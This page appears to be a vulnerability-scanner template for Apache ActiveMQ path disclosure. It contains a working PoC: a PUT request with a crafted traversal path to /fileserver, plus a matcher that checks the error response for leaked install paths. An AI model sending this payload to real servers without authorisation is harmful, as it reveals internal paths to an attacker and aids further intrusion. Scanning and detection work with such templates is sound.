activemq-path-disclosure: ActiveMQ Path Disclosure

2025-08-01 ActiveMQ PoC Public

Description

app="APACHE-ActiveMQ" && title=="Apache ActiveMQ"

PoC

id: activemq-path-disclosure

info:
  name: ActiveMQ Path Disclosure
  author: zan8in
  severity: info
  verified: true
  description: |-
    app="APACHE-ActiveMQ" && title=="Apache ActiveMQ"
  tags: activemq,path-disclosure
  created: 2023/06/24

rules:
  r0:
    request:
      method: PUT
      path: /fileserver/a../../%08/..%08/.%08/%08\\
    expression: response.status == 500 && (response.raw.bcontains(b'\\webapps\\fileserver\\') || response.raw.bcontains(b'/webapps/fileserver/'))
expression: r0()

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities